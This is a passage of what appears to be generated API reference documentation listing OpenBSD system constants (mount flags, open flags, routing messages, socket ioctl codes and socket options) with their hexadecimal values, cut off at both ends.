MAP_RENAME = 0x0 constant MAP_SHARED (line 1026) | MAP_SHARED = 0x1 constant MAP_STACK (line 1027) | MAP_STACK = 0x4000 constant MAP_TRYFIXED (line 1028) | MAP_TRYFIXED = 0x0 constant MCL_CURRENT (line 1029) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 1030) | MCL_FUTURE = 0x2 constant MNT_ASYNC (line 1031) | MNT_ASYNC = 0x40 constant MNT_DEFEXPORTED (line 1032) | MNT_DEFEXPORTED = 0x200 constant MNT_DELEXPORT (line 1033) | MNT_DELEXPORT = 0x20000 constant MNT_DOOMED (line 1034) | MNT_DOOMED = 0x8000000 constant MNT_EXPORTANON (line 1035) | MNT_EXPORTANON = 0x400 constant MNT_EXPORTED (line 1036) | MNT_EXPORTED = 0x100 constant MNT_EXRDONLY (line 1037) | MNT_EXRDONLY = 0x80 constant MNT_FORCE (line 1038) | MNT_FORCE = 0x80000 constant MNT_LAZY (line 1039) | MNT_LAZY = 0x3 constant MNT_LOCAL (line 1040) | MNT_LOCAL = 0x1000 constant MNT_NOATIME (line 1041) | MNT_NOATIME = 0x8000 constant MNT_NODEV (line 1042) | MNT_NODEV = 0x10 constant MNT_NOEXEC (line 1043) | MNT_NOEXEC = 0x4 constant MNT_NOPERM (line 1044) | MNT_NOPERM = 0x20 constant MNT_NOSUID (line 1045) | MNT_NOSUID = 0x8 constant MNT_NOWAIT (line 1046) | MNT_NOWAIT = 0x2 constant MNT_QUOTA (line 1047) | MNT_QUOTA = 0x2000 constant MNT_RDONLY (line 1048) | MNT_RDONLY = 0x1 constant MNT_RELOAD (line 1049) | MNT_RELOAD = 0x40000 constant MNT_ROOTFS (line 1050) | MNT_ROOTFS = 0x4000 constant MNT_SOFTDEP (line 1051) | MNT_SOFTDEP = 0x4000000 constant MNT_STALLED (line 1052) | MNT_STALLED = 0x100000 constant MNT_SWAPPABLE (line 1053) | MNT_SWAPPABLE = 0x200000 constant MNT_SYNCHRONOUS (line 1054) | MNT_SYNCHRONOUS = 0x2 constant MNT_UPDATE (line 1055) | MNT_UPDATE = 0x10000 constant MNT_VISFLAGMASK (line 1056) | MNT_VISFLAGMASK = 0x400ffff constant MNT_WAIT (line 1057) | MNT_WAIT = 0x1 constant MNT_WANTRDWR (line 1058) | MNT_WANTRDWR = 0x2000000 constant MNT_WXALLOWED (line 1059) | MNT_WXALLOWED = 0x800 constant MOUNT_AFS (line 1060) | MOUNT_AFS = "afs" constant MOUNT_CD9660 (line 1061) | MOUNT_CD9660 = "cd9660" constant MOUNT_EXT2FS (line 1062) | MOUNT_EXT2FS = "ext2fs" constant MOUNT_FFS (line 1063) | MOUNT_FFS = "ffs" constant MOUNT_FUSEFS (line 1064) | MOUNT_FUSEFS = "fuse" constant MOUNT_MFS (line 1065) | MOUNT_MFS = "mfs" constant MOUNT_MSDOS (line 1066) | MOUNT_MSDOS = "msdos" constant MOUNT_NCPFS (line 1067) | MOUNT_NCPFS = "ncpfs" constant MOUNT_NFS (line 1068) | MOUNT_NFS = "nfs" constant MOUNT_NTFS (line 1069) | MOUNT_NTFS = "ntfs" constant MOUNT_TMPFS (line 1070) | MOUNT_TMPFS = "tmpfs" constant MOUNT_UDF (line 1071) | MOUNT_UDF = "udf" constant MOUNT_UFS (line 1072) | MOUNT_UFS = "ffs" constant MSG_BCAST (line 1073) | MSG_BCAST = 0x100 constant MSG_CMSG_CLOEXEC (line 1074) | MSG_CMSG_CLOEXEC = 0x800 constant MSG_CTRUNC (line 1075) | MSG_CTRUNC = 0x20 constant MSG_DONTROUTE (line 1076) | MSG_DONTROUTE = 0x4 constant MSG_DONTWAIT (line 1077) | MSG_DONTWAIT = 0x80 constant MSG_EOR (line 1078) | MSG_EOR = 0x8 constant MSG_MCAST (line 1079) | MSG_MCAST = 0x200 constant MSG_NOSIGNAL (line 1080) | MSG_NOSIGNAL = 0x400 constant MSG_OOB (line 1081) | MSG_OOB = 0x1 constant MSG_PEEK (line 1082) | MSG_PEEK = 0x2 constant MSG_TRUNC (line 1083) | MSG_TRUNC = 0x10 constant MSG_WAITALL (line 1084) | MSG_WAITALL = 0x40 constant MSG_WAITFORONE (line 1085) | MSG_WAITFORONE = 0x1000 constant MS_ASYNC (line 1086) | MS_ASYNC = 0x1 constant MS_INVALIDATE (line 1087) | MS_INVALIDATE = 0x4 constant MS_SYNC (line 1088) | MS_SYNC = 0x2 constant NAME_MAX (line 1089) | NAME_MAX = 0xff constant NET_RT_DUMP (line 1090) | NET_RT_DUMP = 0x1 constant NET_RT_FLAGS (line 1091) | NET_RT_FLAGS = 0x2 constant NET_RT_IFLIST (line 1092) | NET_RT_IFLIST = 0x3 constant NET_RT_IFNAMES (line 1093) | NET_RT_IFNAMES = 0x6 constant NET_RT_MAXID (line 1094) | NET_RT_MAXID = 0x8 constant NET_RT_SOURCE (line 1095) | NET_RT_SOURCE = 0x7 constant NET_RT_STATS (line 1096) | NET_RT_STATS = 0x4 constant NET_RT_TABLE (line 1097) | NET_RT_TABLE = 0x5 constant NFDBITS (line 1098) | NFDBITS = 0x20 constant NOFLSH (line 1099) | NOFLSH = 0x80000000 constant NOKERNINFO (line 1100) | NOKERNINFO = 0x2000000 constant NOTE_ATTRIB (line 1101) | NOTE_ATTRIB = 0x8 constant NOTE_CHANGE (line 1102) | NOTE_CHANGE = 0x1 constant NOTE_CHILD (line 1103) | NOTE_CHILD = 0x4 constant NOTE_DELETE (line 1104) | NOTE_DELETE = 0x1 constant NOTE_EOF (line 1105) | NOTE_EOF = 0x2 constant NOTE_EXEC (line 1106) | NOTE_EXEC = 0x20000000 constant NOTE_EXIT (line 1107) | NOTE_EXIT = 0x80000000 constant NOTE_EXTEND (line 1108) | NOTE_EXTEND = 0x4 constant NOTE_FORK (line 1109) | NOTE_FORK = 0x40000000 constant NOTE_LINK (line 1110) | NOTE_LINK = 0x10 constant NOTE_LOWAT (line 1111) | NOTE_LOWAT = 0x1 constant NOTE_OOB (line 1112) | NOTE_OOB = 0x4 constant NOTE_PCTRLMASK (line 1113) | NOTE_PCTRLMASK = 0xf0000000 constant NOTE_PDATAMASK (line 1114) | NOTE_PDATAMASK = 0xfffff constant NOTE_RENAME (line 1115) | NOTE_RENAME = 0x20 constant NOTE_REVOKE (line 1116) | NOTE_REVOKE = 0x40 constant NOTE_TRACK (line 1117) | NOTE_TRACK = 0x1 constant NOTE_TRACKERR (line 1118) | NOTE_TRACKERR = 0x2 constant NOTE_TRUNCATE (line 1119) | NOTE_TRUNCATE = 0x80 constant NOTE_WRITE (line 1120) | NOTE_WRITE = 0x2 constant OCRNL (line 1121) | OCRNL = 0x10 constant OLCUC (line 1122) | OLCUC = 0x20 constant ONLCR (line 1123) | ONLCR = 0x2 constant ONLRET (line 1124) | ONLRET = 0x80 constant ONOCR (line 1125) | ONOCR = 0x40 constant ONOEOT (line 1126) | ONOEOT = 0x8 constant OPOST (line 1127) | OPOST = 0x1 constant OXTABS (line 1128) | OXTABS = 0x4 constant O_ACCMODE (line 1129) | O_ACCMODE = 0x3 constant O_APPEND (line 1130) | O_APPEND = 0x8 constant O_ASYNC (line 1131) | O_ASYNC = 0x40 constant O_CLOEXEC (line 1132) | O_CLOEXEC = 0x10000 constant O_CREAT (line 1133) | O_CREAT = 0x200 constant O_DIRECTORY (line 1134) | O_DIRECTORY = 0x20000 constant O_DSYNC (line 1135) | O_DSYNC = 0x80 constant O_EXCL (line 1136) | O_EXCL = 0x800 constant O_EXLOCK (line 1137) | O_EXLOCK = 0x20 constant O_FSYNC (line 1138) | O_FSYNC = 0x80 constant O_NDELAY (line 1139) | O_NDELAY = 0x4 constant O_NOCTTY (line 1140) | O_NOCTTY = 0x8000 constant O_NOFOLLOW (line 1141) | O_NOFOLLOW = 0x100 constant O_NONBLOCK (line 1142) | O_NONBLOCK = 0x4 constant O_RDONLY (line 1143) | O_RDONLY = 0x0 constant O_RDWR (line 1144) | O_RDWR = 0x2 constant O_RSYNC (line 1145) | O_RSYNC = 0x80 constant O_SHLOCK (line 1146) | O_SHLOCK = 0x10 constant O_SYNC (line 1147) | O_SYNC = 0x80 constant O_TRUNC (line 1148) | O_TRUNC = 0x400 constant O_WRONLY (line 1149) | O_WRONLY = 0x1 constant PARENB (line 1150) | PARENB = 0x1000 constant PARMRK (line 1151) | PARMRK = 0x8 constant PARODD (line 1152) | PARODD = 0x2000 constant PENDIN (line 1153) | PENDIN = 0x20000000 constant PF_FLUSH (line 1154) | PF_FLUSH = 0x1 constant PRIO_PGRP (line 1155) | PRIO_PGRP = 0x1 constant PRIO_PROCESS (line 1156) | PRIO_PROCESS = 0x0 constant PRIO_USER (line 1157) | PRIO_USER = 0x2 constant PROT_EXEC (line 1158) | PROT_EXEC = 0x4 constant PROT_NONE (line 1159) | PROT_NONE = 0x0 constant PROT_READ (line 1160) | PROT_READ = 0x1 constant PROT_WRITE (line 1161) | PROT_WRITE = 0x2 constant RLIMIT_CORE (line 1162) | RLIMIT_CORE = 0x4 constant RLIMIT_CPU (line 1163) | RLIMIT_CPU = 0x0 constant RLIMIT_DATA (line 1164) | RLIMIT_DATA = 0x2 constant RLIMIT_FSIZE (line 1165) | RLIMIT_FSIZE = 0x1 constant RLIMIT_MEMLOCK (line 1166) | RLIMIT_MEMLOCK = 0x6 constant RLIMIT_NOFILE (line 1167) | RLIMIT_NOFILE = 0x8 constant RLIMIT_NPROC (line 1168) | RLIMIT_NPROC = 0x7 constant RLIMIT_RSS (line 1169) | RLIMIT_RSS = 0x5 constant RLIMIT_STACK (line 1170) | RLIMIT_STACK = 0x3 constant RLIM_INFINITY (line 1171) | RLIM_INFINITY = 0x7fffffffffffffff constant RTAX_AUTHOR (line 1172) | RTAX_AUTHOR = 0x6 constant RTAX_BFD (line 1173) | RTAX_BFD = 0xb constant RTAX_BRD (line 1174) | RTAX_BRD = 0x7 constant RTAX_DNS (line 1175) | RTAX_DNS = 0xc constant RTAX_DST (line 1176) | RTAX_DST = 0x0 constant RTAX_GATEWAY (line 1177) | RTAX_GATEWAY = 0x1 constant RTAX_GENMASK (line 1178) | RTAX_GENMASK = 0x3 constant RTAX_IFA (line 1179) | RTAX_IFA = 0x5 constant RTAX_IFP (line 1180) | RTAX_IFP = 0x4 constant RTAX_LABEL (line 1181) | RTAX_LABEL = 0xa constant RTAX_MAX (line 1182) | RTAX_MAX = 0xf constant RTAX_NETMASK (line 1183) | RTAX_NETMASK = 0x2 constant RTAX_SEARCH (line 1184) | RTAX_SEARCH = 0xe constant RTAX_SRC (line 1185) | RTAX_SRC = 0x8 constant RTAX_SRCMASK (line 1186) | RTAX_SRCMASK = 0x9 constant RTAX_STATIC (line 1187) | RTAX_STATIC = 0xd constant RTA_AUTHOR (line 1188) | RTA_AUTHOR = 0x40 constant RTA_BFD (line 1189) | RTA_BFD = 0x800 constant RTA_BRD (line 1190) | RTA_BRD = 0x80 constant RTA_DNS (line 1191) | RTA_DNS = 0x1000 constant RTA_DST (line 1192) | RTA_DST = 0x1 constant RTA_GATEWAY (line 1193) | RTA_GATEWAY = 0x2 constant RTA_GENMASK (line 1194) | RTA_GENMASK = 0x8 constant RTA_IFA (line 1195) | RTA_IFA = 0x20 constant RTA_IFP (line 1196) | RTA_IFP = 0x10 constant RTA_LABEL (line 1197) | RTA_LABEL = 0x400 constant RTA_NETMASK (line 1198) | RTA_NETMASK = 0x4 constant RTA_SEARCH (line 1199) | RTA_SEARCH = 0x4000 constant RTA_SRC (line 1200) | RTA_SRC = 0x100 constant RTA_SRCMASK (line 1201) | RTA_SRCMASK = 0x200 constant RTA_STATIC (line 1202) | RTA_STATIC = 0x2000 constant RTF_ANNOUNCE (line 1203) | RTF_ANNOUNCE = 0x4000 constant RTF_BFD (line 1204) | RTF_BFD = 0x1000000 constant RTF_BLACKHOLE (line 1205) | RTF_BLACKHOLE = 0x1000 constant RTF_BROADCAST (line 1206) | RTF_BROADCAST = 0x400000 constant RTF_CACHED (line 1207) | RTF_CACHED = 0x20000 constant RTF_CLONED (line 1208) | RTF_CLONED = 0x10000 constant RTF_CLONING (line 1209) | RTF_CLONING = 0x100 constant RTF_CONNECTED (line 1210) | RTF_CONNECTED = 0x800000 constant RTF_DONE (line 1211) | RTF_DONE = 0x40 constant RTF_DYNAMIC (line 1212) | RTF_DYNAMIC = 0x10 constant RTF_FMASK (line 1213) | RTF_FMASK = 0x110fc08 constant RTF_GATEWAY (line 1214) | RTF_GATEWAY = 0x2 constant RTF_HOST (line 1215) | RTF_HOST = 0x4 constant RTF_LLINFO (line 1216) | RTF_LLINFO = 0x400 constant RTF_LOCAL (line 1217) | RTF_LOCAL = 0x200000 constant RTF_MODIFIED (line 1218) | RTF_MODIFIED = 0x20 constant RTF_MPATH (line 1219) | RTF_MPATH = 0x40000 constant RTF_MPLS (line 1220) | RTF_MPLS = 0x100000 constant RTF_MULTICAST (line 1221) | RTF_MULTICAST = 0x200 constant RTF_PERMANENT_ARP (line 1222) | RTF_PERMANENT_ARP = 0x2000 constant RTF_PROTO1 (line 1223) | RTF_PROTO1 = 0x8000 constant RTF_PROTO2 (line 1224) | RTF_PROTO2 = 0x4000 constant RTF_PROTO3 (line 1225) | RTF_PROTO3 = 0x2000 constant RTF_REJECT (line 1226) | RTF_REJECT = 0x8 constant RTF_STATIC (line 1227) | RTF_STATIC = 0x800 constant RTF_UP (line 1228) | RTF_UP = 0x1 constant RTF_USETRAILERS (line 1229) | RTF_USETRAILERS = 0x8000 constant RTM_80211INFO (line 1230) | RTM_80211INFO = 0x15 constant RTM_ADD (line 1231) | RTM_ADD = 0x1 constant RTM_BFD (line 1232) | RTM_BFD = 0x12 constant RTM_CHANGE (line 1233) | RTM_CHANGE = 0x3 constant RTM_CHGADDRATTR (line 1234) | RTM_CHGADDRATTR = 0x14 constant RTM_DELADDR (line 1235) | RTM_DELADDR = 0xd constant RTM_DELETE (line 1236) | RTM_DELETE = 0x2 constant RTM_DESYNC (line 1237) | RTM_DESYNC = 0x10 constant RTM_GET (line 1238) | RTM_GET = 0x4 constant RTM_IFANNOUNCE (line 1239) | RTM_IFANNOUNCE = 0xf constant RTM_IFINFO (line 1240) | RTM_IFINFO = 0xe constant RTM_INVALIDATE (line 1241) | RTM_INVALIDATE = 0x11 constant RTM_LOSING (line 1242) | RTM_LOSING = 0x5 constant RTM_MAXSIZE (line 1243) | RTM_MAXSIZE = 0x800 constant RTM_MISS (line 1244) | RTM_MISS = 0x7 constant RTM_NEWADDR (line 1245) | RTM_NEWADDR = 0xc constant RTM_PROPOSAL (line 1246) | RTM_PROPOSAL = 0x13 constant RTM_REDIRECT (line 1247) | RTM_REDIRECT = 0x6 constant RTM_RESOLVE (line 1248) | RTM_RESOLVE = 0xb constant RTM_SOURCE (line 1249) | RTM_SOURCE = 0x16 constant RTM_VERSION (line 1250) | RTM_VERSION = 0x5 constant RTV_EXPIRE (line 1251) | RTV_EXPIRE = 0x4 constant RTV_HOPCOUNT (line 1252) | RTV_HOPCOUNT = 0x2 constant RTV_MTU (line 1253) | RTV_MTU = 0x1 constant RTV_RPIPE (line 1254) | RTV_RPIPE = 0x8 constant RTV_RTT (line 1255) | RTV_RTT = 0x40 constant RTV_RTTVAR (line 1256) | RTV_RTTVAR = 0x80 constant RTV_SPIPE (line 1257) | RTV_SPIPE = 0x10 constant RTV_SSTHRESH (line 1258) | RTV_SSTHRESH = 0x20 constant RT_TABLEID_BITS (line 1259) | RT_TABLEID_BITS = 0x8 constant RT_TABLEID_MASK (line 1260) | RT_TABLEID_MASK = 0xff constant RT_TABLEID_MAX (line 1261) | RT_TABLEID_MAX = 0xff constant RUSAGE_CHILDREN (line 1262) | RUSAGE_CHILDREN = -0x1 constant RUSAGE_SELF (line 1263) | RUSAGE_SELF = 0x0 constant RUSAGE_THREAD (line 1264) | RUSAGE_THREAD = 0x1 constant SCM_RIGHTS (line 1265) | SCM_RIGHTS = 0x1 constant SCM_TIMESTAMP (line 1266) | SCM_TIMESTAMP = 0x4 constant SEEK_CUR (line 1267) | SEEK_CUR = 0x1 constant SEEK_END (line 1268) | SEEK_END = 0x2 constant SEEK_SET (line 1269) | SEEK_SET = 0x0 constant SHUT_RD (line 1270) | SHUT_RD = 0x0 constant SHUT_RDWR (line 1271) | SHUT_RDWR = 0x2 constant SHUT_WR (line 1272) | SHUT_WR = 0x1 constant SIOCADDMULTI (line 1273) | SIOCADDMULTI = 0x80206931 constant SIOCAIFADDR (line 1274) | SIOCAIFADDR = 0x8040691a constant SIOCAIFGROUP (line 1275) | SIOCAIFGROUP = 0x80246987 constant SIOCATMARK (line 1276) | SIOCATMARK = 0x40047307 constant SIOCBRDGADD (line 1277) | SIOCBRDGADD = 0x8060693c constant SIOCBRDGADDL (line 1278) | SIOCBRDGADDL = 0x80606949 constant SIOCBRDGADDS (line 1279) | SIOCBRDGADDS = 0x80606941 constant SIOCBRDGARL (line 1280) | SIOCBRDGARL = 0x808c694d constant SIOCBRDGDADDR (line 1281) | SIOCBRDGDADDR = 0x81286947 constant SIOCBRDGDEL (line 1282) | SIOCBRDGDEL = 0x8060693d constant SIOCBRDGDELS (line 1283) | SIOCBRDGDELS = 0x80606942 constant SIOCBRDGFLUSH (line 1284) | SIOCBRDGFLUSH = 0x80606948 constant SIOCBRDGFRL (line 1285) | SIOCBRDGFRL = 0x808c694e constant SIOCBRDGGCACHE (line 1286) | SIOCBRDGGCACHE = 0xc0146941 constant SIOCBRDGGFD (line 1287) | SIOCBRDGGFD = 0xc0146952 constant SIOCBRDGGHT (line 1288) | SIOCBRDGGHT = 0xc0146951 constant SIOCBRDGGIFFLGS (line 1289) | SIOCBRDGGIFFLGS = 0xc060693e constant SIOCBRDGGMA (line 1290) | SIOCBRDGGMA = 0xc0146953 constant SIOCBRDGGPARAM (line 1291) | SIOCBRDGGPARAM = 0xc0406958 constant SIOCBRDGGPRI (line 1292) | SIOCBRDGGPRI = 0xc0146950 constant SIOCBRDGGRL (line 1293) | SIOCBRDGGRL = 0xc028694f constant SIOCBRDGGTO (line 1294) | SIOCBRDGGTO = 0xc0146946 constant SIOCBRDGIFS (line 1295) | SIOCBRDGIFS = 0xc0606942 constant SIOCBRDGRTS (line 1296) | SIOCBRDGRTS = 0xc0186943 constant SIOCBRDGSADDR (line 1297) | SIOCBRDGSADDR = 0xc1286944 constant SIOCBRDGSCACHE (line 1298) | SIOCBRDGSCACHE = 0x80146940 constant SIOCBRDGSFD (line 1299) | SIOCBRDGSFD = 0x80146952 constant SIOCBRDGSHT (line 1300) | SIOCBRDGSHT = 0x80146951 constant SIOCBRDGSIFCOST (line 1301) | SIOCBRDGSIFCOST = 0x80606955 constant SIOCBRDGSIFFLGS (line 1302) | SIOCBRDGSIFFLGS = 0x8060693f constant SIOCBRDGSIFPRIO (line 1303) | SIOCBRDGSIFPRIO = 0x80606954 constant SIOCBRDGSIFPROT (line 1304) | SIOCBRDGSIFPROT = 0x8060694a constant SIOCBRDGSMA (line 1305) | SIOCBRDGSMA = 0x80146953 constant SIOCBRDGSPRI (line 1306) | SIOCBRDGSPRI = 0x80146950 constant SIOCBRDGSPROTO (line 1307) | SIOCBRDGSPROTO = 0x8014695a constant SIOCBRDGSTO (line 1308) | SIOCBRDGSTO = 0x80146945 constant SIOCBRDGSTXHC (line 1309) | SIOCBRDGSTXHC = 0x80146959 constant SIOCDELLABEL (line 1310) | SIOCDELLABEL = 0x80206997 constant SIOCDELMULTI (line 1311) | SIOCDELMULTI = 0x80206932 constant SIOCDIFADDR (line 1312) | SIOCDIFADDR = 0x80206919 constant SIOCDIFGROUP (line 1313) | SIOCDIFGROUP = 0x80246989 constant SIOCDIFPARENT (line 1314) | SIOCDIFPARENT = 0x802069b4 constant SIOCDIFPHYADDR (line 1315) | SIOCDIFPHYADDR = 0x80206949 constant SIOCDPWE3NEIGHBOR (line 1316) | SIOCDPWE3NEIGHBOR = 0x802069de constant SIOCDVNETID (line 1317) | SIOCDVNETID = 0x802069af constant SIOCGETKALIVE (line 1318) | SIOCGETKALIVE = 0xc01869a4 constant SIOCGETLABEL (line 1319) | SIOCGETLABEL = 0x8020699a constant SIOCGETMPWCFG (line 1320) | SIOCGETMPWCFG = 0xc02069ae constant SIOCGETPFLOW (line 1321) | SIOCGETPFLOW = 0xc02069fe constant SIOCGETPFSYNC (line 1322) | SIOCGETPFSYNC = 0xc02069f8 constant SIOCGETSGCNT (line 1323) | SIOCGETSGCNT = 0xc0147534 constant SIOCGETVIFCNT (line 1324) | SIOCGETVIFCNT = 0xc0147533 constant SIOCGETVLAN (line 1325) | SIOCGETVLAN = 0xc0206990 constant SIOCGIFADDR (line 1326) | SIOCGIFADDR = 0xc0206921 constant SIOCGIFBRDADDR (line 1327) | SIOCGIFBRDADDR = 0xc0206923 constant SIOCGIFCONF (line 1328) | SIOCGIFCONF = 0xc0086924 constant SIOCGIFDATA (line 1329) | SIOCGIFDATA = 0xc020691b constant SIOCGIFDESCR (line 1330) | SIOCGIFDESCR = 0xc0206981 constant SIOCGIFDSTADDR (line 1331) | SIOCGIFDSTADDR = 0xc0206922 constant SIOCGIFFLAGS (line 1332) | SIOCGIFFLAGS = 0xc0206911 constant SIOCGIFGATTR (line 1333) | SIOCGIFGATTR = 0xc024698b constant SIOCGIFGENERIC (line 1334) | SIOCGIFGENERIC = 0xc020693a constant SIOCGIFGLIST (line 1335) | SIOCGIFGLIST = 0xc024698d constant SIOCGIFGMEMB (line 1336) | SIOCGIFGMEMB = 0xc024698a constant SIOCGIFGROUP (line 1337) | SIOCGIFGROUP = 0xc0246988 constant SIOCGIFHARDMTU (line 1338) | SIOCGIFHARDMTU = 0xc02069a5 constant SIOCGIFLLPRIO (line 1339) | SIOCGIFLLPRIO = 0xc02069b6 constant SIOCGIFMEDIA (line 1340) | SIOCGIFMEDIA = 0xc0386938 constant SIOCGIFMETRIC (line 1341) | SIOCGIFMETRIC = 0xc0206917 constant SIOCGIFMTU (line 1342) | SIOCGIFMTU = 0xc020697e constant SIOCGIFNETMASK (line 1343) | SIOCGIFNETMASK = 0xc0206925 constant SIOCGIFPAIR (line 1344) | SIOCGIFPAIR = 0xc02069b1 constant SIOCGIFPARENT (line 1345) | SIOCGIFPARENT = 0xc02069b3 constant SIOCGIFPRIORITY (line 1346) | SIOCGIFPRIORITY = 0xc020699c constant SIOCGIFRDOMAIN (line 1347) | SIOCGIFRDOMAIN = 0xc02069a0 constant SIOCGIFRTLABEL (line 1348) | SIOCGIFRTLABEL = 0xc0206983 constant SIOCGIFRXR (line 1349) | SIOCGIFRXR = 0x802069aa constant SIOCGIFSFFPAGE (line 1350) | SIOCGIFSFFPAGE = 0xc1126939 constant SIOCGIFXFLAGS (line 1351) | SIOCGIFXFLAGS = 0xc020699e constant SIOCGLIFPHYADDR (line 1352) | SIOCGLIFPHYADDR = 0xc218694b constant SIOCGLIFPHYDF (line 1353) | SIOCGLIFPHYDF = 0xc02069c2 constant SIOCGLIFPHYECN (line 1354) | SIOCGLIFPHYECN = 0xc02069c8 constant SIOCGLIFPHYRTABLE (line 1355) | SIOCGLIFPHYRTABLE = 0xc02069a2 constant SIOCGLIFPHYTTL (line 1356) | SIOCGLIFPHYTTL = 0xc02069a9 constant SIOCGPGRP (line 1357) | SIOCGPGRP = 0x40047309 constant SIOCGPWE3 (line 1358) | SIOCGPWE3 = 0xc0206998 constant SIOCGPWE3CTRLWORD (line 1359) | SIOCGPWE3CTRLWORD = 0xc02069dc constant SIOCGPWE3FAT (line 1360) | SIOCGPWE3FAT = 0xc02069dd constant SIOCGPWE3NEIGHBOR (line 1361) | SIOCGPWE3NEIGHBOR = 0xc21869de constant SIOCGRXHPRIO (line 1362) | SIOCGRXHPRIO = 0xc02069db constant SIOCGSPPPPARAMS (line 1363) | SIOCGSPPPPARAMS = 0xc0206994 constant SIOCGTXHPRIO (line 1364) | SIOCGTXHPRIO = 0xc02069c6 constant SIOCGUMBINFO (line 1365) | SIOCGUMBINFO = 0xc02069be constant SIOCGUMBPARAM (line 1366) | SIOCGUMBPARAM = 0xc02069c0 constant SIOCGVH (line 1367) | SIOCGVH = 0xc02069f6 constant SIOCGVNETFLOWID (line 1368) | SIOCGVNETFLOWID = 0xc02069c4 constant SIOCGVNETID (line 1369) | SIOCGVNETID = 0xc02069a7 constant SIOCIFAFATTACH (line 1370) | SIOCIFAFATTACH = 0x801169ab constant SIOCIFAFDETACH (line 1371) | SIOCIFAFDETACH = 0x801169ac constant SIOCIFCREATE (line 1372) | SIOCIFCREATE = 0x8020697a constant SIOCIFDESTROY (line 1373) | SIOCIFDESTROY = 0x80206979 constant SIOCIFGCLONERS (line 1374) | SIOCIFGCLONERS = 0xc00c6978 constant SIOCSETKALIVE (line 1375) | SIOCSETKALIVE = 0x801869a3 constant SIOCSETLABEL (line 1376) | SIOCSETLABEL = 0x80206999 constant SIOCSETMPWCFG (line 1377) | SIOCSETMPWCFG = 0x802069ad constant SIOCSETPFLOW (line 1378) | SIOCSETPFLOW = 0x802069fd constant SIOCSETPFSYNC (line 1379) | SIOCSETPFSYNC = 0x802069f7 constant SIOCSETVLAN (line 1380) | SIOCSETVLAN = 0x8020698f constant SIOCSIFADDR (line 1381) | SIOCSIFADDR = 0x8020690c constant SIOCSIFBRDADDR (line 1382) | SIOCSIFBRDADDR = 0x80206913 constant SIOCSIFDESCR (line 1383) | SIOCSIFDESCR = 0x80206980 constant SIOCSIFDSTADDR (line 1384) | SIOCSIFDSTADDR = 0x8020690e constant SIOCSIFFLAGS (line 1385) | SIOCSIFFLAGS = 0x80206910 constant SIOCSIFGATTR (line 1386) | SIOCSIFGATTR = 0x8024698c constant SIOCSIFGENERIC (line 1387) | SIOCSIFGENERIC = 0x80206939 constant SIOCSIFLLADDR (line 1388) | SIOCSIFLLADDR = 0x8020691f constant SIOCSIFLLPRIO (line 1389) | SIOCSIFLLPRIO = 0x802069b5 constant SIOCSIFMEDIA (line 1390) | SIOCSIFMEDIA = 0xc0206937 constant SIOCSIFMETRIC (line 1391) | SIOCSIFMETRIC = 0x80206918 constant SIOCSIFMTU (line 1392) | SIOCSIFMTU = 0x8020697f constant SIOCSIFNETMASK (line 1393) | SIOCSIFNETMASK = 0x80206916 constant SIOCSIFPAIR (line 1394) | SIOCSIFPAIR = 0x802069b0 constant SIOCSIFPARENT (line 1395) | SIOCSIFPARENT = 0x802069b2 constant SIOCSIFPRIORITY (line 1396) | SIOCSIFPRIORITY = 0x8020699b constant SIOCSIFRDOMAIN (line 1397) | SIOCSIFRDOMAIN = 0x8020699f constant SIOCSIFRTLABEL (line 1398) | SIOCSIFRTLABEL = 0x80206982 constant SIOCSIFXFLAGS (line 1399) | SIOCSIFXFLAGS = 0x8020699d constant SIOCSLIFPHYADDR (line 1400) | SIOCSLIFPHYADDR = 0x8218694a constant SIOCSLIFPHYDF (line 1401) | SIOCSLIFPHYDF = 0x802069c1 constant SIOCSLIFPHYECN (line 1402) | SIOCSLIFPHYECN = 0x802069c7 constant SIOCSLIFPHYRTABLE (line 1403) | SIOCSLIFPHYRTABLE = 0x802069a1 constant SIOCSLIFPHYTTL (line 1404) | SIOCSLIFPHYTTL = 0x802069a8 constant SIOCSPGRP (line 1405) | SIOCSPGRP = 0x80047308 constant SIOCSPWE3CTRLWORD (line 1406) | SIOCSPWE3CTRLWORD = 0x802069dc constant SIOCSPWE3FAT (line 1407) | SIOCSPWE3FAT = 0x802069dd constant SIOCSPWE3NEIGHBOR (line 1408) | SIOCSPWE3NEIGHBOR = 0x821869de constant SIOCSRXHPRIO (line 1409) | SIOCSRXHPRIO = 0x802069db constant SIOCSSPPPPARAMS (line 1410) | SIOCSSPPPPARAMS = 0x80206993 constant SIOCSTXHPRIO (line 1411) | SIOCSTXHPRIO = 0x802069c5 constant SIOCSUMBPARAM (line 1412) | SIOCSUMBPARAM = 0x802069bf constant SIOCSVH (line 1413) | SIOCSVH = 0xc02069f5 constant SIOCSVNETFLOWID (line 1414) | SIOCSVNETFLOWID = 0x802069c3 constant SIOCSVNETID (line 1415) | SIOCSVNETID = 0x802069a6 constant SOCK_CLOEXEC (line 1416) | SOCK_CLOEXEC = 0x8000 constant SOCK_DGRAM (line 1417) | SOCK_DGRAM = 0x2 constant SOCK_DNS (line 1418) | SOCK_DNS = 0x1000 constant SOCK_NONBLOCK (line 1419) | SOCK_NONBLOCK = 0x4000 constant SOCK_RAW (line 1420) | SOCK_RAW = 0x3 constant SOCK_RDM (line 1421) | SOCK_RDM = 0x4 constant SOCK_SEQPACKET (line 1422) | SOCK_SEQPACKET = 0x5 constant SOCK_STREAM (line 1423) | SOCK_STREAM = 0x1 constant SOL_SOCKET (line 1424) | SOL_SOCKET = 0xffff constant SOMAXCONN (line 1425) | SOMAXCONN = 0x80 constant SO_ACCEPTCONN (line 1426) | SO_ACCEPTCONN = 0x2 constant SO_BINDANY (line 1427) | SO_BINDANY = 0x1000 constant SO_BROADCAST (line 1428) | SO_BROADCAST = 0x20 constant SO_DEBUG (line 1429) | SO_DEBUG = 0x1 constant SO_DOMAIN (line 1430) | SO_DOMAIN = 0x1024 constant SO_DONTROUTE (line 1431) | SO_DONTROUTE = 0x10 constant SO_ERROR (line 1432) | SO_ERROR = 0x1007 constant SO_KEEPALIVE (line 1433) | SO_KEEPALIVE = 0x8 constant SO_LINGER (line 1434) | SO_LINGER = 0x80 constant SO_NETPROC (line 1435) | SO_NETPROC = 0x1020 constant SO_OOBINLINE (line 1436) | SO_OOBINLINE = 0x100 constant SO_PEERCRED (line 1437) | SO_PEERCRED = 0x1022 constant SO_PROTOCOL (line 1438) | SO_PROTOCOL = 0x1025 constant SO_RCVBUF (line 1439) | SO_RCVBUF = 0x1002 constant SO_RCVLOWAT (line 1440) | SO_RCVLOWAT = 0x1004 constant 